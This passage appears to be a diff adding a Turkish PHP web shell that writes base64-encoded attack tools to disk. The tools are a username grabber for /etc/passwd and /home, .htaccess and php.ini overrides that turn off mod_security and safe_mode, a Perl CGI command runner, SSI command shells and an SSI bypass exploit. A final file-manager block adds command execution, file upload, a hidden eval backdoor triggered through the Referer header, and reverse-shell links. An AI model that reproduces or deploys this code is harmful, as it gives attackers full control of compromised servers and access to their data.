+Cjxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9IlBPU1QiPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiB2YWx1
+ZT0idHJ1ZSIgbmFtZT0iZ3JhYl91c2VyczEiPjwvaW5wdXQ+CjxpbnB1dCB0eXBlPXN1Ym1pdCB2
+YWx1ZT0iR3JhYiBVc2VybmFtZXMgZnJvbSAvZXRjL3Bhc3N3ZCI+PC9pbnB1dD4KPC9mb3JtPgo8
+L3RyPgo8YnI+Cjx0cj4KPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iUE9TVCI+CjxpbnB1dCB0eXBl
+PSJoaWRkZW4iIHZhbHVlPSJ0cnVlIiBuYW1lPSJncmFiX3VzZXJzMiI+PC9pbnB1dD4KPGlucHV0
+IHR5cGU9c3VibWl0IHZhbHVlPSJHcmFiIFVzZXJuYW1lcyBmcm9tIC9ob21lLyI+PC9pbnB1dD4K
+PC9mb3JtPgo8L3RyPgo8YnI+Cjx0cj4KPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iUE9TVCI+Cjxp
+bnB1dCB0eXBlPSJoaWRkZW4iIHZhbHVlPSJ0cnVlIiBuYW1lPSJncmFiX3VzZXJzMyI+PC9pbnB1
+dD4KPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSJHcmFiIFVzZXJuYW1lcyBmcm9tIC9ob21lLyBJ
+SSI+PC9pbnB1dD4KPC9mb3JtPgo8L3RyPgo8L2Zvcm0+CjwvdGFibGU+Cjw/cGhwCmlmIChpc3Nl
+dCgkX1BPU1RbJ2dyYWJfdXNlcnMzJ10pKQogICAgewoJCWVycm9yX3JlcG9ydGluZygwKTsKICAg
+ICAkZGlyID0gIi9ob21lLyI7CgkgaWYgKCRkaCA9IG9wZW5kaXIoJGRpcikpIAoJIHsKICAgICAg
+ICAkZiA9IHJlYWRkaXIoJGRoKTskZiA9IHJlYWRkaXIoJGRoKTsKICAgICAgICB3aGlsZSAoKCRm
+ID0gcmVhZGRpcigkZGgpKSAhPT0gZmFsc2UpIAogICAgICAgIHsKICAgICAgICAgICAgLy9lY2hv
+ICRmLiAiXG4iOwogICAgICAgICAgICAkZi49Ii8iOwogICAgICAgICAgICAkZGgyPW9wZW5kaXIo
+JGRpci4kZik7CiAgICAgICAgICAgICRmMiA9IHJlYWRkaXIoJGRoMik7JGYyID0gcmVhZGRpcigk
+ZGgyKTsKICAgICAgICAgICAgd2hpbGUgKCgkZjIgPSByZWFkZGlyKCRkaDIpKSAhPT0gZmFsc2Up
+IAogICAgICAgICAgICB7CiAgICAgICAgICAgICAvL2VjaG8gJGYyLiAiXG4iOwogICAgICAgICAg
+ICAgJGYyLj0iLyI7CiAgICAgICAgICAgICAkZGgzPW9wZW5kaXIoJGRpci4kZi4kZjIpOwogICAg
+ICAgICAgICAgJGYzID0gcmVhZGRpcigkZGgzKTskZjMgPSByZWFkZGlyKCRkaDMpOwogICAgICAg
+ICAgICAgd2hpbGUgKCgkZjMgPSByZWFkZGlyKCRkaDMpKSAhPT0gZmFsc2UpIAogICAgICAgICAg
+ICAgewogICAgICAgICAgICAgIGVjaG8gJGYzLiAiPGJyPiI7CiAgICAgICAgICAgICB9CiAgICAg
+ICAgICAgIH0KICAgICAgICAgICAgCiAgICAgICAgfQoJCQljbG9zZWRpcigkZGgpOwoJIH0KCX0K
+Pz4=';
+
+$file = fopen("ftpcrack.php" ,"w+");
+$write = fwrite ($file ,base64_decode($crackftp));
+fclose($file);
+
+� �echo "<iframe src=ftpcrack.php width=100% height=100%
+frameborder=0></iframe> ";
+break;
+case "PHP_27":
+mkdir('safeof', 0755);
+chdir('safeof');
+$kokdosya = ".htaccess";
+
+$dosya_adi = "$kokdosya";
+$dosya = fopen ($dosya_adi , 'w') or die ("Dosya a??lamad?!");
+$metin = "<IfModule mod_security.c>
+� � SecFilterEngine Off
+� � SecFilterScanPOST Off
+</IfModule>";
+fwrite ( $dosya , $metin ) ;
+fclose ($dosya);
+
+$kokdosya = "php.ini";
+
+$dosya_adi = "$kokdosya";
+$dosya = fopen ($dosya_adi , 'w') or die ("Dosya a??lamad?!");
+$metin = "safe_mode � � � � �= � � � OFF
+disable_functions � � � = � � � � � �NONE";
+fwrite ( $dosya , $metin ) ;
+fclose ($dosya);
+$mini = 'PEJPRFkgT25LZXlQcmVzcz0iR2V0S2V5Q29kZSgpOyIgdGV4dD0jZmZmZmZmIGJvdHRvbU1hcmdp
+bj0wIGJnQ29sb3I9IzAwMDAwMCBsZWZ0TWFyZ2luPTAgdG9wTWFyZ2luPTAgcmlnaHRNYXJnaW49
+MCBtYXJnaW5oZWlnaHQ9MCBtYXJnaW53aWR0aD0wPjxjZW50ZXI+PFRBQkxFIHN0eWxlPSJCT1JE
+RVItQ09MTEFQU0U6IGNvbGxhcHNlIiBoZWlnaHQ9MCBjZWxsU3BhY2luZz0wIGJvcmRlckNvbG9y
+RGFyaz0jNjY2NjY2IGNlbGxQYWRkaW5nPTIgd2lkdGg9IjEwMCUiIGJnY29sb3I9IzAwMDAwMCBi
+b3JkZXJDb2xvckxpZ2h0PSNjMGMwYzAgYm9yZGVyPTEgYm9yZGVyY29sb3I9IiNDMEMwQzAiPjx0
+cj48dGggd2lkdGg9IjEwMSUiIGhlaWdodD0iMiIgbm93cmFwIGJvcmRlcmNvbG9yPSIjQzBDMEMw
+IiB2YWxpZ249InRvcCIgY29sc3Bhbj0iMiI+PGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMzNGRiI+
+DQo8P3BocA0KZWNobyAiPGI+PGZvbnQgY29sb3I9Ymx1ZT5Db21tYW5kIFNoZWxsPC9mb250Pjwv
+Yj48YnI+IjsNCnByaW50X3IoJw0KPHByZT4NCjxmb3JtIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIi
+Pg0KPGI+PGZvbnQgY29sb3I9Ymx1ZT5Lb211dCA6PC9mb250PjwvYj48aW5wdXQgbmFtZT0iYmFi
+YSIgdHlwZT0idGV4dCI+PGlucHV0IHZhbHVlPSJCYXMga29tdXR1IGRheWkiIHR5cGU9InN1Ym1p
+dCI+DQo8L2Zvcm0+DQo8L3ByZT4NCicpOw0KaW5pX3Jlc3RvcmUoInNhZmVfbW9kZSIpOw0KaW5p
+X3Jlc3RvcmUoIm9wZW5fYmFzZWRpciIpOw0KJGxpejA9c2hlbGxfZXhlYygkX1BPU1RbYmFiYV0p
+OyANCiRsaXowemltPXNoZWxsX2V4ZWMoJF9QT1NUW2xpejBdKTsgDQokdWlkPXNoZWxsX2V4ZWMo
+J2lkJyk7DQokc2VydmVyPXNoZWxsX2V4ZWMoJ3VuYW1lIC1hJyk7DQplY2hvICI8cHJlPjxoND4i
+Ow0KZWNobyAiPGI+PGZvbnQgY29sb3I9cmVkPmlkIDo8L2ZvbnQ+PC9iPjokdWlkPGJyPiI7DQpl
+Y2hvICI8Yj48Zm9udCBjb2xvcj1yZWQ+U2VydmVyPC9mb250PjwvYj46JHNlcnZlcjxicj4iOw0K
+ZWNobyAiPGI+PGZvbnQgY29sb3I9cmVkPktvbXV0IFNvbnXnbGFyMTo8L2ZvbnQ+PC9iPjxicj4i
+OyANCmVjaG8gJGxpejA7DQplY2hvICRsaXowemltOw0KZWNobyAiPC9oND48L3ByZT4iOw0KPz4=
+';
+
+$file = fopen("safe.php" ,"w+");
+$write = fwrite ($file ,base64_decode($mini));
+fclose($file);
+� �echo "<iframe src=safeof/safe.php width=100% height=100%
+frameborder=0></iframe> ";
+break;
+case "PHP_28":
+� � mkdir('cgirun', 0755);
+� � chdir('cgirun');
+� � � � $kokdosya = ".htaccess";
+� � � � $dosya_adi = "$kokdosya";
+� � � � $dosya = fopen ($dosya_adi , 'w') or die ("Dosya
+a&#231;&#305;lamad&#305;!");
+� � � � $metin = "AddHandler cgi-script .pr";
+� � � � fwrite ( $dosya , $metin ) ;
+� � � � fclose ($dosya);
+$cgico = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbg0KIw0KIyBQZXJsS2l0LTAuMSAt
+IFtEb2FyIHVzZXJpaSBpbnJlZ2lzdHJhdGkgcG90IHZlZGVhIGxpbmt1cmlsZS4gXQ0KIw0KIyBj
+bWQucGw6IFJ1biBjb21tYW5kcyBvbiBhIHdlYnNlcnZlcg0KDQp1c2Ugc3RyaWN0Ow0KDQpteSAo
+JGNtZCwgJUZPUk0pOw0KDQokfD0xOw0KDQpwcmludCAiQ29udGVudC1UeXBlOiB0ZXh0L2h0bWxc
+clxuIjsNCnByaW50ICJcclxuIjsNCg0KIyBHZXQgcGFyYW1ldGVycw0KDQolRk9STSA9IHBhcnNl
+X3BhcmFtZXRlcnMoJEVOVnsnUVVFUllfU1RSSU5HJ30pOw0KDQppZihkZWZpbmVkICRGT1JNeydj
+bWQnfSkgew0KICAkY21kID0gJEZPUk17J2NtZCd9Ow0KfQ0KDQpwcmludCAnPEhUTUw+DQo8Ym9k
+eT4NCjxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9IkdFVCI+DQo8aW5wdXQgdHlwZT0idGV4dCIgbmFt
+ZT0iY21kIiBzaXplPTQ1IHZhbHVlPSInIC4gJGNtZCAuICciPg0KPGlucHV0IHR5cGU9InN1Ym1p
+dCIgdmFsdWU9IlJ1biI+DQo8L2Zvcm0+DQo8cHJlPic7DQoNCmlmKGRlZmluZWQgJEZPUk17J2Nt
+ZCd9KSB7DQogIHByaW50ICJSZXN1bHRzIG9mICckY21kJyBleGVjdXRpb246XG5cbiI7DQogIHBy
+aW50ICItIng4MDsNCiAgcHJpbnQgIlxuIjsNCg0KICBvcGVuKENNRCwgIigkY21kKSAyPiYxIHwi
+KSB8fCBwcmludCAiQ291bGQgbm90IGV4ZWN1dGUgY29tbWFuZCI7DQoNCiAgd2hpbGUoPENNRD4p
+IHsNCiAgICBwcmludDsNCiAgfQ0KDQogIGNsb3NlKENNRCk7DQogIHByaW50ICItIng4MDsNCiAg
+cHJpbnQgIlxuIjsNCn0NCg0KcHJpbnQgIjwvcHJlPiI7DQoNCnN1YiBwYXJzZV9wYXJhbWV0ZXJz
+ICgkKSB7DQogIG15ICVyZXQ7DQoNCiAgbXkgJGlucHV0ID0gc2hpZnQ7DQoNCiAgZm9yZWFjaCBt
+eSAkcGFpciAoc3BsaXQoJyYnLCAkaW5wdXQpKSB7DQogICAgbXkgKCR2YXIsICR2YWx1ZSkgPSBz
+cGxpdCgnPScsICRwYWlyLCAyKTsNCiAgICANCiAgICBpZigkdmFyKSB7DQogICAgICAkdmFsdWUg
+PX4gcy9cKy8gL2cgOw0KICAgICAgJHZhbHVlID1+IHMvJSguLikvcGFjaygnYycsaGV4KCQxKSkv
+ZWc7DQoNCiAgICAgICRyZXR7JHZhcn0gPSAkdmFsdWU7DQogICAgfQ0KICB9DQoNCiAgcmV0dXJu
+ICVyZXQ7DQp9';
+
+$file = fopen("cgi.pr" ,"w+");
+$write = fwrite ($file ,base64_decode($cgico));
+fclose($file);
+� � chmod("cgi.pr",0755);
+� �echo "<iframe src=cgirun/cgi.pr width=100% height=100%
+frameborder=0></iframe> ";
+break;
+case "PHP_29":
+� � mkdir('ssim', 0755);
+� � chdir('ssim');
+� � � � $kokdosya = ".htaccess";
+� � � � $dosya_adi = "$kokdosya";
+� � � � $dosya = fopen ($dosya_adi , 'w') or die ("Dosya
+a&#231;&#305;lamad&#305;!");
+� � � � $metin = "AddType text/html .shtml
+AddHandler server-parsed .shtml
+AddOutputFilter INCLUDES .shtml
+Options +Includes";
+� � � � fwrite ( $dosya , $metin ) ;
+� � � � fclose ($dosya);
+$ssiizo2023 = 'PCEtLSNpZiBleHByPSIkSFRUUF9IQ01EIi0tPjwhLS0jZXhlYyBjbWQ9ImNkICRIVFRQX0hQV0Q7
+ICRIVFRQX0hDTUQgMj4mMSItLT48IS0tI2Vsc2UtLT48aHRtbD48aGVhZD48dGl0bGU+UC5TLlMu
+PC90aXRsZT48c3R5bGUgdHlwZT0idGV4dC9jc3MiPmh0bWwsYm9keSwjanNvbix4bXAsZm9ybSx0
+YWJsZSx0YWJsZSB0ZCxpbnB1dHttYXJnaW46MDtwYWRkaW5nOjA7fWh0bWx7YmFja2dyb3VuZDoj
+MDAwMDAwO30uZXJye3BhZGRpbmc6OHB4O3RleHQtYWxpZ246Y2VudGVyO2JvcmRlcjoxcHggc29s
+aWQgcmVkO2JhY2tncm91bmQ6I2ZmZmZmZjt9I2pzb2Zme21hcmdpbjo1cHggOHB4O30janNvbntk
+aXNwbGF5Om5vbmU7IHBhZGRpbmc6NXB4IDhweDt9eG1wLHRhYmxlLGlucHV0e2ZvbnQ6bm9ybWFs
+IDlwdCAiQ291cmllciBOZXciO2NvbG9yOiNmMGYwZjA7Ym9yZGVyOm5vbmU7fXRhYmxle3dpZHRo
+OjEwMCU7Ym9yZGVyLWNvbGxhcHNlOmNvbGxhcHNlO30udGRuYnJ7d2hpdGUtc3BhY2U6cHJlO31p
+bnB1dHtvdXRsaW5lOm5vbmU7IGJhY2tncm91bmQ6IzAwMDAwMDt9aW5wdXQ6Oi1tb3otZm9jdXMt
+aW5uZXJ7Ym9yZGVyOm5vbmU7fTwvc3R5bGU+PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQi
+PnZhciByZXosY21kLGhpc3QsdXNyLHNydixwd2Qsc3VzcixzcHdkO2Z1bmN0aW9uIHRyaW0oc3Ry
+KXtyZXR1cm4gc3RyLnJlcGxhY2UoLyheXHMrKXwoXHMrJCkvZywgIiIpO31mdW5jdGlvbiBpbml0
+KCl7cmV6PWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdyZXonKTtjbWQ9ZG9jdW1lbnQuZ2V0RWxl
+bWVudEJ5SWQoJ2NtZCcpO2hpc3Q9ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2hpc3QnKTtzdXNy
+PWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdzdXNyJyk7c3B3ZD1kb2N1bWVudC5nZXRFbGVtZW50
+QnlJZCgnc3B3ZCcpO3Vzcj10cmltKGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCd1c3InKS52YWx1
+ZSk7c3J2PWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdzc3J2JykuaW5uZXJIVE1MO3B3ZD10cmlt
+KGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdwd2QnKS52YWx1ZSk7ZG9jdW1lbnQuZ2V0RWxlbWVu
+dEJ5SWQoJ2pzb2ZmJykuc3R5bGUuZGlzcGxheT0nbm9uZSc7ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5
+SWQoJ2pzb24nKS5zdHlsZS5kaXNwbGF5PSdibG9jayc7aWYoc3Vzci5pbm5lclRleHQpe3N1c3Iu
+aW5uZXJUZXh0PXVzcjtzcHdkLmlubmVyVGV4dD1wd2Q7fWVsc2V7c3Vzci50ZXh0Q29udGVudD11
+c3I7c3B3ZC50ZXh0Q29udGVudD1wd2Q7fWNtZC5mb2N1cygpOzwhLS0jaWYgZXhwcj0iIi0tPgpk
+b2N1bWVudC5nZXRFbGVtZW50QnlJZCgnc3Npb24nKS5zdHlsZS5kaXNwbGF5PSdub25lJzs8IS0t
+I2VuZGlmLS0+Cn1mdW5jdGlvbiBlbmRDbWQoKXtpZihzdXNyLmlubmVyVGV4dCljbWQudmFsdWU9
+Jyc7ZWxzZXtjbWQuYmx1cigpO2NtZC52YWx1ZT0nJztjbWQuZm9jdXMoKTt9ZG9jdW1lbnQuYm9k
+eS5zY3JvbGxUb3A9ZG9jdW1lbnQuYm9keS5zY3JvbGxIZWlnaHQ7fWZ1bmN0aW9uIHNlbmRDbWQo
+KXt2YXIgY21kVmFsdWU9Y21kLnZhbHVlO2lmKGhpc3Qub3B0aW9ucyl7dmFyIGlzVW5pcXVlPXRy
+dWUsb3B0Q291bnQ9aGlzdC5vcHRpb25zLmxlbmd0aDtmb3IodmFyIGk9MDtpPG9wdENvdW50O2kr
+KylpZihoaXN0Lm9wdGlvbnNbaV0udmFsdWU9PWNtZFZhbHVlKXtpc1VuaXF1ZT1mYWxzZTticmVh
+azt9aWYoaXNVbmlxdWUpaGlzdC5hcHBlbmRDaGlsZChuZXcgT3B0aW9uKGNtZFZhbHVlLGNtZFZh
+bHVlKSk7fWlmKGNtZFZhbHVlPT0nY2xlYXInKXtyZXouaW5uZXJIVE1MPScnO2VuZENtZCgpO31l
+bHNlIGlmKGNtZFZhbHVlPT0nZXhpdCcpd2luZG93LmNsb3NlKCk7ZWxzZSBpZihjbWRWYWx1ZSE9
+Jycpe3ZhciBhamF4PW5ldyBYTUxIdHRwUmVxdWVzdCgpO2FqYXguY21kPWNtZFZhbHVlO2lmKGNt
+ZFZhbHVlLnN1YnN0cigwLDMpPT0nY2QgJyljbWRWYWx1ZSs9JyAyPiYxOyBwd2QnO2FqYXgub3Bl
+bignR0VUJyxkb2N1bWVudC5VUkwsdHJ1ZSk7YWpheC5vbnJlYWR5c3RhdGVjaGFuZ2U9b25TdGF0
+dXNDaGFuZ2U7YWpheC5zZXRSZXF1ZXN0SGVhZGVyKCdIVVNSJyx1c3IpO2FqYXguc2V0UmVxdWVz
+dEhlYWRlcignSFBXRCcscHdkKTthamF4LnNldFJlcXVlc3RIZWFkZXIoJ0hDTUQnLGNtZFZhbHVl
+KTthamF4LnNlbmQobnVsbCk7fX1mdW5jdGlvbiBvblN0YXR1c0NoYW5nZSgpe2lmKHRoaXMucmVh
+ZHlTdGF0ZT09NCl7aWYodGhpcy5zdGF0dXM9PTIwMCl7dmFyIHJlcz11c3IrJ0AnK3NydisnOicr
+cHdkKyckICcrdGhpcy5jbWQrJ1xuJztpZih0aGlzLmNtZC5zdWJzdHIoMCwzKT09J2NkICcpe2lm
+KHRoaXMucmVzcG9uc2VUZXh0LmluZGV4T2YoImNhbid0IGNkIik9PS0xKXtwd2Q9dHJpbSh0aGlz
+LnJlc3BvbnNlVGV4dCk7aWYocHdkLmlubmVyVGV4dClzcHdkLmlubmVyVGV4dD1wd2Q7ZWxzZSBz
+cHdkLnRleHRDb250ZW50PXB3ZDtyZXMrPSdcbic7fWVsc2UgcmVzKz0nY2FuXCd0IGNkICcrdGhp
+cy5jbWQuc3Vic3RyKDMpKydcblxuJzt9ZWxzZSByZXMrPXRoaXMucmVzcG9uc2VUZXh0O2lmKHJl
+ei5pbm5lclRleHQpcmV6LmlubmVyVGV4dCs9cmVzO2Vsc2UgcmV6LnRleHRDb250ZW50Kz1yZXM7
+ZW5kQ21kKCk7fWVsc2UgYWxlcnQoIkVSUk9SOlxuU3RhdHVzOiAiK3RoaXMuc3RhdHVzKyIgKCIr
+dGhpcy5zdGF0dXNUZXh0KyIpXG5Db21tYW5kOiAiK3RoaXMuY21kKTt9fTwvc2NyaXB0PjwvaGVh
+ZD48Ym9keSBvbmxvYWQ9ImluaXQoKSI+PGRpdiBpZD0ianNvZmYiIGNsYXNzPSJlcnIiPkNhbid0
+IHdvcmsgd2l0aG91dCBqYXZhc2NyaXB0LiBTb3JyeS48L2Rpdj48ZGl2IGlkPSJqc29uIj48IS0t
+I2lmIGV4cHI9IiItLT48ZGl2IGNsYXNzPSJlcnIiPlNTSSBub3Qgd29yay4gU29ycnkuPC9kaXY+
+PCEtLSNlbmRpZi0tPjxkaXYgaWQ9InNzaW9uIj48eG1wIGlkPSJyZXoiPjwveG1wPjxmb3JtIGFj
+dGlvbj0iIiBtZXRob2Q9InBvc3QiIG9uc3VibWl0PSJzZW5kQ21kKCk7IHJldHVybiBmYWxzZSI+
+PHRhYmxlIGJvcmRlcj0iMCI+PHRyPjx0ZCB3aWR0aD0iMTBweCIgY2xhc3M9InRkbmJyIj48c3Bh
+biBpZD0ic3VzciI+PC9zcGFuPkA8c3BhbiBpZD0ic3NydiI+PCEtLSNlY2hvIHZhcj0iU0VSVkVS
+X05BTUUiLS0+PC9zcGFuPjo8c3BhbiBpZD0ic3B3ZCI+PC9zcGFuPiQgPC90ZD48dGQ+PGlucHV0
+IHR5cGU9InRleHQiIGlkPSJjbWQiIHN0eWxlPSJ3aWR0aDoxMDAlIiBsaXN0PSJoaXN0Ii8+PC90
+ZD48dGQgd2lkdGg9IjEwcHgiPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSImZ3Q7Jmd0OyIv
+PjwvdGQ+PC90cj48L3RhYmxlPjxkYXRhbGlzdCBpZD0iaGlzdCI+PC9kYXRhbGlzdD48aW5wdXQg
+dHlwZT0iaGlkZGVuIiBpZD0idXNyIiB2YWx1ZT0iPCEtLSNleGVjIGNtZD0id2hvYW1pIi0tPiIv
+PjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJwd2QiIHZhbHVlPSI8IS0tI2V4ZWMgY21kPSJwd2Qi
+LS0+Ii8+PC9mb3JtPjwvZGl2PjwvZGl2PjwvYm9keT48L2h0bWw+PCEtLSNlbmRpZi0tPgo=';
+
+$file = fopen("pss_v.1.0_min.shtml" ,"w+");
+$write = fwrite ($file ,base64_decode($ssiizo2023));
+fclose($file);
+
+� �echo "<iframe src=ssim/pss_v.1.0_min.shtml width=100% height=100%
+frameborder=0></iframe> ";
+break;
+case "PHP_30":
+� � mkdir('Ph33r', 0755);
+� � chdir('Ph33r');
+� � � � $kokdosya = ".htaccess";
+� � � � $dosya_adi = "$kokdosya";
+� � � � $dosya = fopen ($dosya_adi , 'w') or die ("Dosya
+a&#231;&#305;lamad&#305;!");
+� � � � $metin = "AddHandler server-parsed .html .Ph33r";
+� � � � fwrite ( $dosya , $metin ) ;
+� � � � fclose ($dosya);
+$sabolamer = 'dXNlckBOaW5qYS1TZWN1cml0eTp+CjwhLS0jZXhlYyBjbWQ9IiRIVFRQX0FDQ0VQVCIgLS0+';
+$file = fopen("Ph33r.Ph33r" ,"w+");
+$write = fwrite ($file ,base64_decode($sabolamer));
+fclose($file);
+$izobasbakan = 'PD9waHAKCiMgVVJMIFNTSQokdXJsUGgzID0gJ1BoMzNyLlBoMzNyJzsKCiAgICBmdW5jdGlvbiBz
+ZW5kKCR1cmxQaDMsJGNtZCkKICAgIHsKICAgICAgICBpZigkY3VybCA9IGN1cmxfaW5pdCgpKQog
+ICAgICAgIHsjIGJ5cGFzcyAyMDExCgkJICMgc2FmZV9tb2QgJiBQSFBTdUhvc2luICYgZGlzYWJs
+ZV9mdW5jdGlvbnMKCQkgIyBCeSBQaDMzcgogICAgICAgICAgICBjdXJsX3NldG9wdCgkY3VybCxD
+VVJMT1BUX1VSTCwgJHVybFBoMyk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjdXJsLENVUkxP
+UFRfUkVUVVJOVFJBTlNGRVIsdHJ1ZSk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjdXJsLENV
+UkxPUFRfQ09OTkVDVFRJTUVPVVQsMzApOwoKICAgICAgICAgICAgJGhlYWRlcnMgPSBhcnJheSgi
+QWNjZXB0OiAiLiRjbWQpOwoKICAgICAgICAgICAgY3VybF9zZXRvcHQoJGN1cmwsQ1VSTE9QVF9I
+VFRQSEVBREVSLCRoZWFkZXJzKTsKICAgICAgICAgICAgY3VybF9zZXRvcHQoJGN1cmwsQ1VSTE9Q
+VF9VUkwsJHVybFBoMyk7CiAgICAgICAgICAgIHJldHVybiBjdXJsX2V4ZWMoJGN1cmwpOwoKICAg
+ICAgICB9CiAgICAgICAgY3VybF9jbG9zZSgkY3VybCk7CiAgICB9CiAgICBwcmludCAnPGhlYWQ+
+Cjx0aXRsZT4gUGgzM3IgLSBieXBhc3MgMjAxMSBTU2kgPC90aXRsZT4KPHN0eWxlIHR5cGU9InRl
+eHQvY3NzIj4KLmF1dG8tc3R5bGUxIHsKCXRleHQtYWxpZ246IGNlbnRlcjsKfQouYXV0by1zdHls
+ZTIgewoJdGV4dC1hbGlnbjogY2VudGVyOwoJZm9udC13ZWlnaHQ6IGJvbGQ7Cglmb250LWZhbWls
+eTogQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZjsKfQouYXV0by1zdHlsZTMgewoJdGV4dC1h
+bGlnbjogY2VudGVyOwoJY29sb3I6ICNGRjk5MzM7Cn0KLmF1dG8tc3R5bGU0IHsKCWZvbnQtc2l6
+ZTogeHgtc21hbGw7Cglmb250LXdlaWdodDogYm9sZDsKfQphIHsKCWNvbG9yOiAjQzBDMEMwOwp9
+CmE6dmlzaXRlZCB7Cgljb2xvcjogI0MwQzBDMDsKfQphOmFjdGl2ZSB7Cgljb2xvcjogI0MwQzBD
+MDsKfQphOmhvdmVyIHsKCWNvbG9yOiAjQzBDMEMwOwp9Cjwvc3R5bGU+CjwvaGVhZD4nOwogICAg
+cHJpbnQnPGJvZHkgc3R5bGU9ImNvbG9yOiAjRkY5OTMzOyBiYWNrZ3JvdW5kLWNvbG9yOiAjNjY2
+NjY2OyAiPgoKPGRpdiBjbGFzcz0iYXV0by1zdHlsZTMiPgonOwogICAgcHJpbnQgJwk8c3BhbiBj
+bGFzcz0iYXV0by1zdHlsZTIiPlNTSSBleHBsb2l0IC0gJy4kdXJsUGgzLic8L3NwYW4+IDxiciBj
+bGFzcz0iYXV0by1zdHlsZTQiIC8+PGJyIC8+JzsKCXByaW50ICc8L2Rpdj4nOwogICAgcHJpbnQg
+JzwvZGl2Pgo8Zm9ybSBhY3Rpb249IiMiIG1ldGhvZD0icG9zdCI+Cgk8ZGl2IGNsYXNzPSJhdXRv
+LXN0eWxlMSI+JzsKCiAgICBwcmludCAkX1BPU1RbJ2NtZCddLic6IDxiciAvPic7CiAgICBwcmlu
+dCAnPHRleHRhcmVhIHdyYXA9Im9mZiIgc3R5bGU9IndpZHRoOiA2OTdweDsgaGVpZ2h0OiAyOTNw
+eCIgbmFtZT0iUGgzM3IiPicuIHNlbmQoJHVybFBoMywkX1BPU1RbJ2NtZCddKSAuJzwvdGV4dGFy
+ZWE+PGJyIC8+JzsKCiAgICBwcmludCAnPGlucHV0IG5hbWU9ImNtZCIgdHlwZT0idGV4dCIgdmFs
+dWU9InVuYW1lIC1hIj48YnIgLz4nOwoKICAgIHByaW50ICc8aW5wdXQgdHlwZT0ic3VibWl0IiB2
+YWx1ZT0iUGgzM3IiPjxiciAvPic7CiAgICBwcmludCAnPC9kaXY+IDwvZm9ybT4KIDxhIGhyZWY9
+Imh0dHA6Ly9wZW50ZXN0LmVua24ubmV0L2Jsb2cucGhwIj4gCjxwIGNsYXNzPSJhdXRvLXN0eWxl
+MSI+TmluamEtU2VjdXJpdHkgdGVhbTxwPjwvYT4KPHAgY2xhc3M9ImF1dG8tc3R5bGUxIj4KPGZv
+bnQgY29sb3I9IiNGRjAwMDAiPjxiPkFudGktdHJ1c3QgLSBQaDMzciAtPGZvbnQgY29sb3I9IiNG
+RjAwMDAiPkJsYWNrIApIYXQgLSBtYXowMDI8L2ZvbnQ+JzsKcHJpbnQgJzxwIGNsYXNzPSJhdXRv
+LXN0eWxlMSI+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj48Yj4gd2VsY29tZS1iYWNrIDogc2VjLXIx
+ei5jb20gPC9mb250PjwvYT4gPC9iPic7Cgo/Pg==';
+
+$file = fopen("Ph33r.php" ,"w+");
+$write = fwrite ($file ,base64_decode($izobasbakan));
+fclose($file);
+
+� �echo "<iframe src=Ph33r/Ph33r.php width=100% height=100%
+frameborder=0></iframe> ";
+break;
+}
+?>
+<?
+// Keeps your deface
+error_reporting(0);set_magic_quotes_runtime(0);if(strtolower(substr(PHP_OS,
+0, 3)) == "win"){$s="\\";}else{$s="/";}$ad=$_REQUEST['ad'];
+if ($ad){chdir($ad);}else{$ad=getcwd();}if
+($_FILES["ff"]){move_uploaded_file($_FILES["ff"]["tmp_name"],
+$_FILES["ff"]["name"]);}
+if ($hr = opendir($ad)) {while($f = readdir($hr)){if(is_dir($f)){$df=$df.$f.'
+';}else{$lf=$lf.$f.'
+';}}closedir($hr);}$form='<form action="'.$_SERVER['PHP_SELF'].'" method=get>';
+parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' &&
+count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ", "+",
+join(array_slice($a,count($a)-3)))));echo '</star>';}
+echo '<center><textarea cols=90
+rows=20>';if($_GET['cme']){passthru($_GET['cme']);}else{echo
+$df.$lf;};echo'</textarea>'.$form.'Change Dir : <input name=ad size=50
+value='.getcwd().$s.'><input type=submit
+value=Go></form>'.$form.'Command Execute : <input name=cme size=50
+value=id> <input type=submit value=eXecute></form><form
+action="'.$me.'" method=post enctype=multipart/form-data>Upload :
+<input size=50 type=file name=ff > <input type=hidden name=ad
+value='.getcwd().'><input type=submit
+value=Send></form>'.$form.'Modeminizde 22 port a&#231;&#305;k
+olmal&#305; : <a href="?BackConnect=PHP_1"><font color="green">Php
+Backconnect 1</font></a>
+&nbsp;&nbsp;<a href="?BackConnect=PHP_2"><font color="red">Php
+Backconnect 2</font></a>&nbsp;&nbsp;<a href="?BackConnect=PHP_3"><font
+color="orange">Php Backconnect 3</font></a>&nbsp;&nbsp;<a
+href="?BackConnect=PHP_13"><font color="orange">Php Backconnect
+4</font></a>&nbsp;&nbsp;<a href="?BackConnect=PHP_4"><font
+color="pink">Dc Backconnect</font></a>&nbsp;&nbsp;<a
+href="?BackConnect=PHP_21"><font
+color="white">Perlsocket</font></a>&nbsp;&nbsp;<a
+href="?BackConnect=PHP_5"><font color="yellow">Python
+Bacconnect</font></a>&nbsp;&nbsp;<a href="?BackConnect=PHP_17"><font
+color="red">Python izo</font></a>&nbsp;&nbsp;<a
+href="?BackConnect=PHP_12"><font color="brown">Metasploit
+Bacconnect</font></a></form>';
+?>
